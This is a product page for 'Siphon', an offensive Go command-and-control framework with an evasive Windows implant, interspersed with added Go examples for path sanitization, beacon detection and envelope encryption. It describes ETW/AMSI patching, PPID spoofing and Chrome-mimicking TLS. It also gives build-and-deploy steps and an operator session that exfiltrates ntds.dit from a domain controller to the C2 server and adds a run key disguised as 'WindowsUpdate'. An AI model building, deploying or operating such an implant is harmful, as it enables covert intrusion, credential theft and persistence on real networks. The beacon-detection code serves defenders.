
Siphon

Lightweight C2 framework with per-session forward secrecy, encrypted transport, and runtime evasion. Built in Go.

Encrypted C2. Zero disk footprint.

Deploy a lightweight implant on the target. Communicate over encrypted HTTPS with per-session ECDH key exchange. Exfiltrate files, execute commands, and persist — all through an interactive operator console.

Forward Secrecy

Ephemeral ECDH P-256 key exchange per session. Server public key embedded at build time — no config files on disk.

Encrypted Transport

AES-256-GCM authenticated encryption with HMAC-SHA256 message authentication covering all envelope fields.

TLS Fingerprinting

uTLS with Chrome JA3 fingerprint. Cookie-based beacon transport blends with normal HTTPS traffic.

Runtime Evasion

ETW and AMSI patching on startup. PPID spoofing under explorer.exe. CREATE_NO_WINDOW for stealth.

Persistence

Registry run keys, scheduled tasks, and startup folder. All methods include cleanup via unpersist commands.

Encrypted Loot

Exfiltrated files encrypted at rest with AES-256-GCM. Path traversal protection on implant-controlled IDs.
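The filepath.Base() protection mentioned above, as an added example that is not Siphon's own server code: a loot-path function that applies the sanitization the page describes and adds the checks a reviewer would want on top of it (explicit rejection of "." and "..", an allow-list on the implant id, and a final containment check). The lootRoot constant, the id alphabet, the ".enc" suffix and the error names are assumptions; the id format follows the ids shown on this page (d8a7822b, abc123).

```go
package main

import (
	"errors"
	"fmt"
	"path/filepath"
	"regexp"
	"strings"
)

// lootRoot is the directory exfiltrated files are written under. The page's
// session shows loot/<implant-id>/<file>.enc; the constant name is assumed.
const lootRoot = "loot"

// implantIDRe is an assumption: the ids shown on the page are short lowercase
// hex, so anything else is rejected outright. An allow-list is easier to
// reason about than any amount of sanitizing.
var implantIDRe = regexp.MustCompile(`^[0-9a-f]{6,64}$`)

var (
	ErrBadImplantID = errors.New("invalid implant id")
	ErrBadFileID    = errors.New("invalid file id")
	ErrEscapesRoot  = errors.New("path escapes loot root")
)

// lootPath maps two implant-controlled identifiers to a path under lootRoot.
// filepath.Base strips any directory component, which is the protection the
// page names, but three things are left for the caller:
//   - Base("..") is still "..", and Base("") is ".", so both must be rejected;
//   - Base only knows the host OS separator, so a backslash survives on a
//     Linux server and would become a separator if the loot directory were
//     later read on Windows (the framework is cross-platform);
//   - the assembled path should still be checked against the root.
func lootPath(implantID, fileID string) (string, error) {
	id := filepath.Base(implantID)
	if !implantIDRe.MatchString(id) { // also rejects "." and ".."
		return "", ErrBadImplantID
	}
	name := filepath.Base(fileID)
	if name == "." || name == ".." || strings.ContainsAny(name, `/\`) {
		return "", ErrBadFileID
	}
	p := filepath.Join(lootRoot, id, name+".enc")
	// Final invariant: the cleaned path must still sit inside lootRoot.
	rel, err := filepath.Rel(lootRoot, p)
	if err != nil || rel == ".." || strings.HasPrefix(rel, ".."+string(filepath.Separator)) {
		return "", ErrEscapesRoot
	}
	return p, nil
}

func main() {
	// Constructed inputs: one clean pair, then three traversal attempts.
	for _, c := range [][2]string{
		{"d8a7822b", "a3f2c1"},
		{"../../etc", "passwd"},
		{"d8a7822b", "../../../etc/passwd"},
		{"d8a7822b", `..\..\x`},
	} {
		p, err := lootPath(c[0], c[1])
		fmt.Printf("%-12q %-22q -> %q %v\n", c[0], c[1], p, err)
	}
}
```

The third case is the instructive one: Base() turns "../../../etc/passwd" into "passwd", so the write lands inside the loot directory, exactly as the page claims. The fourth case shows why the backslash check matters on a Linux server that is also expected to run on Windows.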

Resource Limits

Max 1000 implants, 1000 results per implant, 512 KB upload chunks, 24h max sleep, input size limits.

Operator Console

Interactive CLI with Catppuccin Mocha palette. Prefix-match selection, task queuing, live results.

Operator Session

Deploy the server, catch a beacon, and interact with the implant — all from an encrypted, authenticated channel.

```text
./build/siphon-server -listen :443 -auth s3cret
[server] listening on :443 (HTTPS)
[beacon] new implant registered: d8a7822b (windows/amd64)
siphon> interact d8a7822b
[+] interacting with d8a7822b (CORP\admin@DC01)
siphon(d8a7822b)> cmd whoami
[+] task queued: e5b97d57
[submit] result from d8a7822b task=e5b97d57 success=true

┄┄┄ [ok] task=e5b97d57 ┄┄┄
corp\admin
siphon(d8a7822b)> upload C:\Windows\NTDS\ntds.dit
[+] upload task queued: ntds.dit → server (loot/d8a7822b/)
[loot] saved 16384 bytes (encrypted) → loot/d8a7822b/a3f2c1.enc
siphon(d8a7822b)> persist registry WindowsUpdate
[+] persist task queued: method=registry
registry run key added: WindowsUpdate → C:\...\OneDriveStandaloneUpdater.exe
```

Encrypted C2 session — per-session ECDH keys, AES-256-GCM transport.

Three layers. Build-time config.

Shared protocol types, a beacon-loop implant with ECDH key exchange, and an operator server with encrypted loot storage. All implant configuration is baked at compile time via ldflags — the binary takes zero config files.

Project Structure

```text
shared/
  types.go          Protocol types & HMAC auth

implant/
  main.go           Beacon loop with backoff
  comms.go          ECDH + AES-256-GCM
  transport.go      HTTPS client (uTLS)
  tasks.go          Task dispatcher
  evasion_*.go      PPID spoofing, stealth
  patches_*.go      ETW/AMSI patching
  persist_*.go      Registry, schtask, startup

server/
  handlers.go       Beacon & submit handlers
  crypto.go         Key exchange & encryption
  cli.go            Operator console
  cmd/main.go       Entry point & TLS gen
```
Data Flow

```text
┌──────────┐                              ┌──────────┐
│ Implant  │                              │  Server  │
└────┬─────┘                              └────┬─────┘
     │          HTTPS GET /beacon              │
     ├────────────────────────────────────────►│
     │          Encrypted Task                 │
     │◄────────────────────────────────────────┤
     │          HTTPS POST /submit             │
     ├────────────────────────────────────────►│
     │                                    ┌────┴──────┐
     │                                    │   Loot    │
     │                                    │ (AES-GCM) │
     │                                    └───────────┘
```
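Seen from the network side, the flow above is a fixed-path GET repeated at the sleep interval, with an occasional POST when a result is ready. The following Go program is an added example, not part of Siphon, that runs a standard beaconing heuristic over constructed proxy log lines: group requests by client, method, host and path, then report series whose inter-arrival gaps are both frequent and regular (low coefficient of variation). The log format, the hostnames, the client addresses and the thresholds are all assumptions made for the example.

```go
package main

import (
	"bufio"
	"fmt"
	"math"
	"sort"
	"strings"
	"time"
)

// sampleLog is constructed for this example, not a real capture. Format:
// "<RFC3339 time> <client> <method> <host> <path>". Client 10.1.2.3 polls one
// path roughly every 60 s with a little jitter, the way a sleep-interval
// beacon does, and posts results twice; client 10.1.2.9 browses irregularly.
const sampleLog = `
2025-01-10T09:00:00Z 10.1.2.3 GET cdn-updates.example /api/news
2025-01-10T09:00:05Z 10.1.2.9 GET www.example /index.html
2025-01-10T09:00:07Z 10.1.2.9 GET www.example /index.html
2025-01-10T09:01:02Z 10.1.2.3 GET cdn-updates.example /api/news
2025-01-10T09:01:03Z 10.1.2.3 POST cdn-updates.example /api/submit
2025-01-10T09:02:01Z 10.1.2.3 GET cdn-updates.example /api/news
2025-01-10T09:03:03Z 10.1.2.3 GET cdn-updates.example /api/news
2025-01-10T09:03:59Z 10.1.2.3 GET cdn-updates.example /api/news
2025-01-10T09:04:30Z 10.1.2.9 GET www.example /index.html
2025-01-10T09:05:01Z 10.1.2.3 GET cdn-updates.example /api/news
2025-01-10T09:05:02Z 10.1.2.3 POST cdn-updates.example /api/submit
2025-01-10T09:12:00Z 10.1.2.9 GET www.example /index.html
2025-01-10T09:12:01Z 10.1.2.9 GET www.example /index.html
2025-01-10T09:40:00Z 10.1.2.9 GET www.example /index.html
`

type hit struct {
	ts                         time.Time
	client, method, host, path string
}

func parseLine(line string) (hit, error) {
	f := strings.Fields(line)
	if len(f) != 5 {
		return hit{}, fmt.Errorf("malformed line: %q", line)
	}
	ts, err := time.Parse(time.RFC3339, f[0])
	if err != nil {
		return hit{}, err
	}
	return hit{ts: ts, client: f[1], method: f[2], host: f[3], path: f[4]}, nil
}

type beaconFinding struct {
	Key      string  // "<client> <method> <host><path>"
	Count    int     // requests in the series
	MeanSecs float64 // mean inter-arrival gap
	CV       float64 // stddev/mean of the gaps; near 0 means metronomic
}

// meanCV returns the mean and the coefficient of variation of xs (len >= 1).
func meanCV(xs []float64) (mean, cv float64) {
	for _, x := range xs {
		mean += x
	}
	mean /= float64(len(xs))
	var ss float64
	for _, x := range xs {
		d := x - mean
		ss += d * d
	}
	return mean, math.Sqrt(ss/float64(len(xs))) / mean
}

// findBeacons groups requests by (client, method, host, path), sorts each
// series by time, computes the gaps between consecutive requests and reports
// series with at least minHits requests whose gap CV is at most maxCV.
func findBeacons(log string, minHits int, maxCV float64) []beaconFinding {
	series := map[string][]time.Time{}
	sc := bufio.NewScanner(strings.NewReader(log))
	for sc.Scan() {
		line := strings.TrimSpace(sc.Text())
		if line == "" {
			continue
		}
		h, err := parseLine(line)
		if err != nil {
			continue // a production detector would count and surface these
		}
		k := h.client + " " + h.method + " " + h.host + h.path
		series[k] = append(series[k], h.ts)
	}
	var out []beaconFinding
	for k, ts := range series {
		if len(ts) < minHits || len(ts) < 2 {
			continue
		}
		sort.Slice(ts, func(i, j int) bool { return ts[i].Before(ts[j]) })
		gaps := make([]float64, 0, len(ts)-1)
		for i := 1; i < len(ts); i++ {
			gaps = append(gaps, ts[i].Sub(ts[i-1]).Seconds())
		}
		if mean, cv := meanCV(gaps); mean > 0 && cv <= maxCV {
			out = append(out, beaconFinding{Key: k, Count: len(ts), MeanSecs: mean, CV: cv})
		}
	}
	sort.Slice(out, func(i, j int) bool { return out[i].Key < out[j].Key })
	return out
}

func main() {
	for _, f := range findBeacons(sampleLog, 5, 0.2) {
		fmt.Printf("%s  n=%d  mean=%.1fs  cv=%.3f\n", f.Key, f.Count, f.MeanSecs, f.CV)
	}
}
```

On the constructed log only the polling series is reported (six requests, a 60.2 s mean gap, CV about 0.04); the browsing client has the same number of requests but a CV above 1. Two caveats follow from the page itself: the implant's beacon loop uses backoff and the operator can change the interval with the sleep command, so a detector has to tolerate jitter and re-baseline when the period shifts, which is what the CV threshold trades off; and because the client presents a Chrome JA3 fingerprint, the TLS handshake alone will not separate this traffic, which is why timing and path regularity are used here instead.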

Go 1.24 · ECDH P-256 · AES-256-GCM · uTLS · CGO_ENABLED=0 · Cross-Platform

What powers Siphon

Every layer of the framework, from key exchange to operator UI, is chosen for operational security and minimal footprint.

| Layer | Technology |
|---|---|
| Language | Go 1.24.9 |
| Crypto | ECDH P-256, AES-256-GCM, HMAC-SHA256 |
| TLS | uTLS (HelloChrome_Auto) |
| Transport | HTTPS, cookie beacon, JSON envelopes |
| Evasion | ETW/AMSI patches, PPID spoofing |
| Persistence | Registry, schtask, startup folder |
| UI | Catppuccin Mocha (operator CLI) |
| Build | Make, cross-compilation (CGO_ENABLED=0) |
| Testing | go test -race, go vet, staticcheck |

Server flags & operator commands

Everything you need to run the server and interact with implants from the operator console.

Server Flags

| Flag | Default | Description |
|---|---|---|
| -listen | :443 | Listen address |
| -cert | server/certs/server.crt | TLS certificate path |
| -key | server/certs/server.key | TLS private key path |
| -serverkey | server/certs/server.pem | ECDH server key path |
| -beacon-path | /api/news | Beacon endpoint URL path |
| -submit-path | /api/submit | Submit endpoint URL path |
| -auth | (none) | Pre-shared HMAC auth token |
| -genkey | | Generate ECDH keypair and exit |
| -gencert | | Generate self-signed TLS cert and exit |

Operator Commands

| Command | Description |
|---|---|
| implants | List all checked-in implants |
| interact <id> | Select an implant to interact with |
| cmd <command> | Execute a shell command on the active implant |
| upload <remote_path> | Exfiltrate a file from the implant to the server |
| download <local> <remote> | Push a file from the server to the implant |
| sleep <seconds> | Adjust the implant beacon interval |
| persist <method> [name] | Install persistence (registry, schtask, startup) |
| unpersist <method> [name] | Remove persistence |
| selfdestruct | Rename and delete the implant binary |
| exit-implant | Instruct the implant process to exit |
| back | Return to the main menu |
| tasks | Show queued tasks for the active implant |
| results | Show task results for the active implant |
| help | Print command reference |
| exit | Exit the operator console |

Defense in depth

Every layer of the framework is designed for operational security — from ephemeral key exchange to binary hardening.

| Property | Implementation |
|---|---|
| Forward secrecy | Ephemeral ECDH P-256 key exchange per session |
| Payload confidentiality | AES-256-GCM authenticated encryption |
| Key distribution | Server public key embedded at build time via ldflags |
| HMAC authentication | HMAC-SHA256 pre-shared token covering ID, PubKey, Nonce, Ciphertext |
| Loot encryption | Exfiltrated files encrypted at rest with AES-256-GCM |
| Path traversal | filepath.Base() sanitization on implant-controlled IDs |
| Memory safety | Deep-copied session keys; ECDH shared secrets zeroed after use |
| TLS fingerprinting | uTLS with Chrome JA3 fingerprint (HelloChrome_Auto) |
| Resource limits | Max 1000 implants, 1000 results per implant, 24h max sleep |
| Binary hardening | Stripped with -s -w -trimpath; no debug symbols or paths |
| Traffic blending | uTLS Chrome fingerprint, cookie-based beacon, standard HTTPS endpoints |
| Input limits | 64 KB cookie, 1 MB response, 10 MB submit body |
| File permissions | 0600 for all sensitive outputs |
| Concurrency safety | sync.RWMutex and atomic operations throughout |
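The forward-secrecy, payload-confidentiality, key-distribution, HMAC-authentication and memory-safety rows above describe one construction, and the Encrypted Transport card earlier on the page says the same thing in one sentence. The following Go program is an added reference implementation of that construction for review purposes, not Siphon's comms.go or crypto.go: an ephemeral P-256 key (per message here, per session in the table), ECDH against a pinned server public key, a minimal HKDF-SHA256 to derive the AES-256-GCM key, and an HMAC-SHA256 keyed by the pre-shared token over ID, PubKey, Nonce and Ciphertext, verified in constant time before any decryption. The struct and JSON tags, the length-prefixed HMAC input, the HKDF info label, the MAC field name and the use of ID as GCM additional data are this example's choices, not statements about the project's wire format.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/ecdh"
	"crypto/hmac"
	"crypto/rand"
	"crypto/sha256"
	"encoding/binary"
	"errors"
	"fmt"
)

// Envelope carries the fields the page says the HMAC covers: ID, PubKey, Nonce,
// Ciphertext. Field names, JSON tags and the MAC field are this example's own.
type Envelope struct {
	ID         string `json:"id"`
	PubKey     []byte `json:"pubkey"` // sender's ephemeral P-256 public key (SEC1)
	Nonce      []byte `json:"nonce"`
	Ciphertext []byte `json:"ciphertext"`
	MAC        []byte `json:"mac"`
}

// newServerKey stands in for the key that -genkey writes to server.pem.
func newServerKey() (*ecdh.PrivateKey, error) { return ecdh.P256().GenerateKey(rand.Reader) }

// sessionKey derives the AES-256 key from the ECDH shared secret with a
// minimal HKDF-SHA256 (extract with empty salt, one expand block) and zeroes
// the secret afterwards. Zeroing is best effort: Go does not promise that this
// slice was the only copy, which is why session keys need their own lifetime.
func sessionKey(shared []byte) []byte {
	defer func() {
		for i := range shared {
			shared[i] = 0
		}
	}()
	prk := hmac.New(sha256.New, nil)
	prk.Write(shared)
	okm := hmac.New(sha256.New, prk.Sum(nil))
	okm.Write([]byte("siphon-example-session")) // info label, assumed
	okm.Write([]byte{1})
	return okm.Sum(nil)
}

// envelopeMAC is HMAC-SHA256 under the pre-shared token over every field but
// MAC. Fields are length-prefixed so "ab"+"c" and "a"+"bc" cannot collide.
func envelopeMAC(token []byte, e Envelope) []byte {
	m := hmac.New(sha256.New, token)
	for _, f := range [][]byte{[]byte(e.ID), e.PubKey, e.Nonce, e.Ciphertext} {
		var n [4]byte
		binary.BigEndian.PutUint32(n[:], uint32(len(f)))
		m.Write(n[:])
		m.Write(f)
	}
	return m.Sum(nil)
}

func newGCM(key []byte) (cipher.AEAD, error) {
	block, err := aes.NewCipher(key)
	if err != nil { return nil, err }
	return cipher.NewGCM(block)
}

// sealEnvelope: fresh ephemeral key, ECDH with the pinned server key, AES-256-GCM
// with the implant ID as additional data, then the token HMAC over the result.
func sealEnvelope(serverPub *ecdh.PublicKey, token []byte, id string, plaintext []byte) (Envelope, error) {
	eph, err := ecdh.P256().GenerateKey(rand.Reader)
	if err != nil { return Envelope{}, err }
	shared, err := eph.ECDH(serverPub)
	if err != nil { return Envelope{}, err }
	gcm, err := newGCM(sessionKey(shared))
	if err != nil { return Envelope{}, err }
	nonce := make([]byte, gcm.NonceSize())
	if _, err := rand.Read(nonce); err != nil { return Envelope{}, err }
	e := Envelope{ID: id, PubKey: eph.PublicKey().Bytes(), Nonce: nonce}
	e.Ciphertext = gcm.Seal(nil, nonce, plaintext, []byte(id))
	e.MAC = envelopeMAC(token, e)
	return e, nil
}

// openEnvelope checks the HMAC in constant time before doing any key agreement,
// so a sender without the token cannot make the server do ECDH or AES work.
func openEnvelope(serverPriv *ecdh.PrivateKey, token []byte, e Envelope) ([]byte, error) {
	if !hmac.Equal(e.MAC, envelopeMAC(token, e)) { return nil, errors.New("envelope HMAC mismatch") }
	pub, err := ecdh.P256().NewPublicKey(e.PubKey)
	if err != nil { return nil, fmt.Errorf("bad peer key: %w", err) }
	shared, err := serverPriv.ECDH(pub)
	if err != nil { return nil, err }
	gcm, err := newGCM(sessionKey(shared))
	if err != nil { return nil, err }
	if len(e.Nonce) != gcm.NonceSize() { return nil, errors.New("bad nonce length") } // Open panics otherwise
	return gcm.Open(nil, e.Nonce, e.Ciphertext, []byte(e.ID))
}

func main() {
	serverPriv, _ := newServerKey()
	token := []byte("s3cret") // constructed, matches the page's demo flag value
	env, _ := sealEnvelope(serverPriv.PublicKey(), token, "d8a7822b", []byte("whoami"))
	pt, err := openEnvelope(serverPriv, token, env)
	fmt.Printf("plaintext=%q err=%v\n", pt, err)
}
```

Two review points fall out of writing it down. First, the HMAC is what gates unauthenticated senders: anyone holding the embedded server public key can complete the ECDH and produce a valid AES-GCM ciphertext, so the token check has to run before key agreement, and a server that skipped it would accept traffic from any copy of the implant binary. Second, the HMAC must cover the ID and the nonce and not only the ciphertext, otherwise a valid envelope could be replayed under a different implant ID; the length prefixes close the remaining gap where two different field splits would hash identically.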

Operational in 60 seconds

Generate keys, build the server and implant, deploy. Go 1.24+ and make are the only requirements.

```bash
$ # Generate ECDH keypair + TLS cert
$ make setup
$ # Build the server
$ make server
$ # Build the implant
$ make implant SERVER_PK=<hex> C2_HOST=https://your-c2:443
$ # Start the server
$ ./build/siphon-server -listen :443 -auth secret
$ # Deploy implant on target, then interact:
siphon> interact abc123
siphon(abc123)> cmd whoami
```

make setup generates an ECDH P-256 keypair and a self-signed TLS certificate. The server public key hex is printed for embedding into implant builds.

The implant is cross-compiled for Windows by default (GOOS=windows GOARCH=amd64). Use make implant-linux for a Linux test build.

All implant configuration — C2 host, sleep interval, server public key, auth token — is baked into the binary at compile time via -ldflags -X. The implant takes zero arguments and leaves no config on disk.

The server uses HTTPS with optional HMAC authentication. Set -auth on both the server and the implant build (AUTH_TOKEN=) to enable message-level authentication.

Built for offense. Encrypted by default.